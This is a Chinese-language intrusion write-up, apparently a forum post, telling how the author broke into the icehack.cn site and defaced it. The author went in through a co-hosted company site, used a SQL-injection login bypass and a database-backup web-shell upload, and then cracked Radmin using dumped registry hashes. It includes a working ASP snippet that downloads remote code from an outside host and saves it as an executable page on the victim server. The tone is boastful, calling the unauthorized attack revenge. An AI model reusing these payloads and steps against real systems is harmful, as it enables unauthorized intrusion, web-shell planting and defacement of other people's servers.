注：本人已經(jīng)提交到C.R.S.T ,適合新人學(xué)習(xí).. 首先是有個(gè)朋友對我說有個(gè)冰蘭黑客基地，轉(zhuǎn)載別人的文章還不著名作者，之后還蒙騙別人說他們能入侵國外站點(diǎn). 所以就想檢測一下.
首先看了以下他的站點(diǎn)，主站和論壇.分別在不同的服務(wù)器.
主站是新云的，雖然爆出很多漏洞，但是畢竟人家也是玩黑的，所以不期望能從程序漏洞拿了..
論壇是php的.沒仔細(xì)看，決定滲透了.
一：點(diǎn)兵
拿出旁注
地址：http://www.icehack.cn
IP：XX.X.XX.X（忘記了...）
挖靠，N多站點(diǎn)....
最后選擇了一個(gè)公司的站點(diǎn)，有注射點(diǎn)，但是不顯示錯(cuò)誤，手工猜解是asc數(shù)據(jù)庫 ...
拿出HDSI掃后臺，掃到后臺地址為http://www.XXXXX.com/Product/manage/Manage.asp
到這里的時(shí)候直接用'or'='or' 試了下. 進(jìn)去了..
有數(shù)據(jù)庫備份和恢復(fù). 直接傳jpg的木馬（大馬）.傳不上去，可能限制了大小.
之后換小馬，紅狼1K大的小馬，傳好后備份.成功. 二：士氣
小馬傳好了，各位一定認(rèn)為直接傳大馬 ，之后就是提權(quán)的事了吧.可惜好事多磨...
傳好小馬之后我直接傳個(gè)大馬上傳，但是如圖1
提示錯(cuò)誤：很抱歉，由于您提交的內(nèi)容中或訪問的內(nèi)容中含有系統(tǒng)不允許的關(guān)鍵詞，本次操作無效，系統(tǒng)已記錄您的IP及您提交的所有數(shù)據(jù)。請注意，不要提交任何違反國家規(guī)定的內(nèi)容！本次攔截的相關(guān)信息為：98424b88afb8 我以為換個(gè)大馬就可以了，之后換了N個(gè)，國內(nèi)的，國外的都試了.我想可能是禁止提交了，但是我提交幾個(gè)字都可以提交上去，到這里，我快放棄了。
但是忽然想到一哥們（煙，滅在雪里）的方法.具體如下：
提交代碼
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.hackerchina.cn/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("1.asp"),2
set sGet = nothing
set sPOST = nothing
%>
利用服務(wù)器的XML和數(shù)據(jù)流組件，從我的blog的1.txt的內(nèi)容下載到目標(biāo)站點(diǎn)根目錄并保存為1.asp.
我提交這段代碼，保存為3.asp ，之后訪問，顯示空白.
之后訪問1.asp.如圖
，成功了..
三 出征
已經(jīng)拿到了一個(gè)webshell，就剩下提權(quán)了，但是提權(quán)一般難度要比webshell還難.如何呢？
WEB服務(wù)器版本 Microsoft-IIS/6.0
Scripting.FileSystemObject √ 文件操作組件
wscript.shell × 命令行執(zhí)行組件
ADOX.Catalog √ ACCESS建庫組件
JRO.JetEngine √ ACCESS壓縮組件
Scripting.Dictionary √ 數(shù)據(jù)流上傳輔助組件
Adodb.connection √ 數(shù)據(jù)庫連接組件
Adodb.Stream √ 數(shù)據(jù)流上傳組件
SoftArtisans.FileUp × SA-FileUp 文件上傳組件
LyfUpload.UploadFile × 劉云峰文件上傳組件
Persits.Upload.1 √ ASPUpload 文件上傳組件
JMail.SmtpMail √ JMail 郵件收發(fā)組件
CDONTS.NewMail × 虛擬SMTP發(fā)信組件
SmtpMail.SmtpMail.1 × SmtpMail發(fā)信組件
wscript.shell × 命令行執(zhí)行組件被刪除.
裝了servU6.3 但是找不路徑，沒有權(quán)限訪問.不可跨目錄，
只有C:\Program Files C:\Documents and Settings可訪問，裝了麥咖啡，
（感謝傷心的魚）一兄弟告訴我本地溢出，baidu了下 都是控件的，感覺麻煩..
繼續(xù)找別的突破口，忽然看到有radmin 目錄，哈哈，高興，看來裝了radmin.
掃描了下端口，竟然沒開43958.算了，讀取下注冊表 讀取不了.但是radmin的目錄下有3個(gè)注冊表文件，下載回來研究。
四 得勝
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers]
"1"=hex:24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,\
00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f1,03,00,00,24,00,00,00,00,00,00,00,\
1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,\
64,8a,f8,ec,03,00,00,24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,\
00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f4,01,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Port"=hex:fe,ff,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:01,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:01,00,00,00
"Parameter"=hex:b3,8f,17,d7,f9,4e,cb,96,11,26,42,bf,29,cd,a6,86
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\RAdmin]
[HKEY_CURRENT_USER\Software\RAdmin\v2.0]
[HKEY_CURRENT_USER\Software\RAdmin\v2.0\Parameters]
"showbw"=hex:01,00,00,00
"ViewType"=hex:00,00,00,00
"ConnectionMode"=hex:49,9c,00,00
"xsize"=hex:77,01,00,00
"ysize"=hex:47,01,00,00
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin]
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01]
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:35,e3,db,da,7c,ef,32,ad,2c,a5,b8,1a,4b,e2,b2,47,7b,1d,eb,05,4c,36,\
0e,65,8a,ff,ec,aa,7d,63,a1,47,50,db,f2,0a,c5,a7,1d,dd,08,6b,7f,02,90,2b,b8,\
6c,da,7a,96,cb,dc,c9,e2,1a,8c,4d,25,39,57,f8,ee,83
以上是注冊表文件的內(nèi)容，
提權(quán)的步驟 感謝 fhod 支持.
3個(gè)注冊表在本地運(yùn)行之后，然后本地打開radmin設(shè)置，發(fā)現(xiàn)端口為65534
但是密碼是32位MD5，麻煩.怎么破呢..
用星號密碼查看器查看為 reityewi
，連接.....................連接不上...郁悶了..
后來才知道星號密碼查看器 看到的都是這個(gè)reityewi....
后來，baidu了下.找到一篇文章是直接破解radmin控制端.
地址：http://www.hackerchina.cn/index/blog/post/123.html
之后連接radmin....ok.連接上了..
五 收兵
直接找到iis.
中間還有個(gè)小插曲...
管理員登陸了3389.這里再次感謝fhod，（和管理員比速度）...
打開iis，找到冰蘭的站點(diǎn)，之后傳了大馬上去.如圖.
呵呵 之后修改了首頁，但是并沒有對數(shù)據(jù)進(jìn)行刪除，算是帶點(diǎn)報(bào)復(fù)的友情檢測 再次感謝 傷心的魚 fhod 煙，滅在雪里提供技術(shù)支持.

最新評論